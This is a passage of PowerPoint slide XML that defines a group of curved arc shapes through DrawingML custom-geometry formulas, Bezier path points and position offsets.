                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26070" h="31631" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="156"/>
                    <a:pt x="2967" y="0"/>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0"/>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4" name="Arc 1408">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0817E56-B184-D44F-91C3-EB8C00B568B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3628" y="2110"/>
              <a:ext cx="574" cy="418"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4429 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26029"/>
                <a:gd name="T1" fmla="*/ 459 h 31708"/>
                <a:gd name="T2" fmla="*/ 23518 w 26029"/>
                <a:gd name="T3" fmla="*/ 31708 h 31708"/>
                <a:gd name="T4" fmla="*/ 4429 w 26029"/>
                <a:gd name="T5" fmla="*/ 21600 h 31708"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26029" h="31708" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="458"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1456" y="153"/>
                    <a:pt x="2940" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66945" name="Arc 1409">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E249D6B-3854-BE43-9746-684DBFBC2556}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2534"/>
              <a:ext cx="556" cy="428"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16794 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13584 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29154"/>
                <a:gd name="T2" fmla="*/ 17714 w 21600"/>
                <a:gd name="T3" fmla="*/ 29154 h 29154"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16794 h 29154"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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6" name="Arc 1410">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0631C8A0-BF90-6E43-BD7D-99B0C8419FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2538"/>
              <a:ext cx="549" cy="420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16858 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13505 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29298"/>
                <a:gd name="T2" fmla="*/ 17658 w 21600"/>
                <a:gd name="T3" fmla="*/ 29298 h 29298"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16858 h 29298"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66947" name="Arc 1411">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32C1BE7D-EB9C-1D4D-B9AD-C7B697920D56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609" y="2973"/>
              <a:ext cx="651" cy="607"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7055 0 0"/>
                <a:gd name="G1" fmla="+- 5557 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27928 w 28655"/>
                <a:gd name="T1" fmla="*/ 0 h 27157"/>
                <a:gd name="T2" fmla="*/ 0 w 28655"/>
                <a:gd name="T3" fmla="*/ 25972 h 27157"/>
                <a:gd name="T4" fmla="*/ 7055 w 28655"/>
                <a:gd name="T5" fmla="*/ 5557 h 27157"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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8" name="Arc 1412">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012375D7-A465-5845-B7AB-9106216AD955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3611" y="2975"/>
              <a:ext cx="642" cy="598"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7053 0 0"/>
                <a:gd name="G1" fmla="+- 5558 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27926 w 28653"/>
                <a:gd name="T1" fmla="*/ 0 h 27158"/>
                <a:gd name="T2" fmla="*/ 0 w 28653"/>
                <a:gd name="T3" fmla="*/ 25974 h 27158"/>
                <a:gd name="T4" fmla="*/ 7053 w 28653"/>
                <a:gd name="T5" fmla="*/ 5558 h 27158"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66949" name="Arc 1413">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E41DB85-121B-D543-9920-2709F2E2B932}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2529"/>
              <a:ext cx="354" cy="592"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12845 w 21600"/>
                <a:gd name="T1" fmla="*/ 41297 h 41297"/>
                <a:gd name="T2" fmla="*/ 20141 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41297"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41297"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41297" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10187"/>
                    <a:pt x="8803" y="767"/>
                    <a:pt x="20141" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41297" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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0" name="Arc 1414">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440BFFFA-2AD8-334F-892B-F8458D5981FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1365" y="2536"/>
              <a:ext cx="347" cy="578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12867 w 21600"/>
                <a:gd name="T1" fmla="*/ 41307 h 41307"/>
                <a:gd name="T2" fmla="*/ 20146 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41307"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41307"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41307" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10186"/>
                    <a:pt x="8806" y="765"/>
                    <a:pt x="20145" y="-1"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41307" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66951" name="Arc 1415">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7927E2CB-D870-C847-83BF-CA1D98CBE488}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2293" y="3335"/>
              <a:ext cx="1344" cy="361"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21277 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39224 w 39224"/>
                <a:gd name="T1" fmla="*/ 12019 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39224"/>
                <a:gd name="T3" fmla="*/ 3720 h 21600"/>
                <a:gd name="T4" fmla="*/ 21277 w 39224"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39224" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>
                    <a:pt x="21277" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10782" y="21600"/>
                    <a:pt x="1807" y="14057"/>
                    <a:pt x="-1" y="3720"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39224" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>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2" name="Arc 1416">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980B4A70-4BD7-A644-953A-4E672DC61D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2300" y="3335"/>
              <a:ext cx="1329" cy="354"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21271 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39161 w 39161"/>
                <a:gd name="T1" fmla="*/ 12103 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39161"/>
                <a:gd name="T3" fmla="*/ 3756 h 21600"/>
                <a:gd name="T4" fmla="*/ 21271 w 39161"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39161" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>
                    <a:pt x="21271" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10790" y="21600"/>
                    <a:pt x="1822" y="14076"/>
                    <a:pt x="0" y="3755"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39161" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66953" name="Group 1417">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8BBB6E-1A13-F441-B745-97B1F0E3C474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3226352" y="1811160"/>
            <a:ext cx="1800067" cy="1651117"/>
            <a:chOff x="1358" y="1886"/>
            <a:chExt cx="2989" cy="1810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66954" name="Arc 1418">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669B7C2C-D854-4F48-9776-6F655E404016}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2404" y="1886"/>
              <a:ext cx="1247" cy="375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20666 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40985"/>
                <a:gd name="T1" fmla="*/ 15316 h 21600"/>
                <a:gd name="T2" fmla="*/ 40985 w 40985"/>
                <a:gd name="T3" fmla="*/ 14272 h 21600"/>
                <a:gd name="T4" fmla="*/ 20666 w 40985"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40985" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>
                    <a:pt x="20666" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29769" y="0"/>
                    <a:pt x="37896" y="5708"/>
                    <a:pt x="40984" y="14272"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40985" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="15316"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2766" y="6218"/>
                    <a:pt x="11157" y="0"/>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5" name="Arc 1419">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669AFF07-E8F3-324F-B92B-E6024F9A72A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2412" y="1893"/>
              <a:ext cx="1232" cy="368"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 20651 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 40951"/>
                <a:gd name="T1" fmla="*/ 15269 h 21600"/>
                <a:gd name="T2" fmla="*/ 40951 w 40951"/>
                <a:gd name="T3" fmla="*/ 14220 h 21600"/>
                <a:gd name="T4" fmla="*/ 20651 w 40951"/>
                <a:gd name="T5" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="40951" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>
                    <a:pt x="20651" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29734" y="0"/>
                    <a:pt x="37847" y="5683"/>
                    <a:pt x="40951" y="14219"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="40951" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="15268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2781" y="6195"/>
                    <a:pt x="11160" y="0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66956" name="Arc 1420">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A82EC4-E4B1-3F49-8924-AED923327EB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1662" y="2081"/>
              <a:ext cx="766" cy="446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 392 w 33007"/>
                <a:gd name="T1" fmla="*/ 25698 h 25698"/>
                <a:gd name="T2" fmla="*/ 33007 w 33007"/>
                <a:gd name="T3" fmla="*/ 3258 h 25698"/>
                <a:gd name="T4" fmla="*/ 21600 w 33007"/>
                <a:gd name="T5" fmla="*/ 21600 h 25698"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="33007" h="25698" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="392" y="25697"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="24347"/>
                    <a:pt x="0" y="22975"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25631" y="0"/>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0"/>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7" name="Arc 1421">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAD7211-910A-FC42-B644-B7851CB68BF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1669" y="2088"/>
              <a:ext cx="755" cy="438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 396 w 32968"/>
                <a:gd name="T1" fmla="*/ 25717 h 25717"/>
                <a:gd name="T2" fmla="*/ 32968 w 32968"/>
                <a:gd name="T3" fmla="*/ 3233 h 25717"/>
                <a:gd name="T4" fmla="*/ 21600 w 32968"/>
                <a:gd name="T5" fmla="*/ 21600 h 25717"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32968" h="25717" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="395" y="25717"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="24360"/>
                    <a:pt x="0" y="22981"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25616" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66958" name="Arc 1422">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA541F72-6620-F14E-AE2A-B1E1461001F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1553" y="3120"/>
              <a:ext cx="773" cy="345"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 384 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32097 w 32097"/>
                <a:gd name="T1" fmla="*/ 19262 h 21984"/>
                <a:gd name="T2" fmla="*/ 3 w 32097"/>
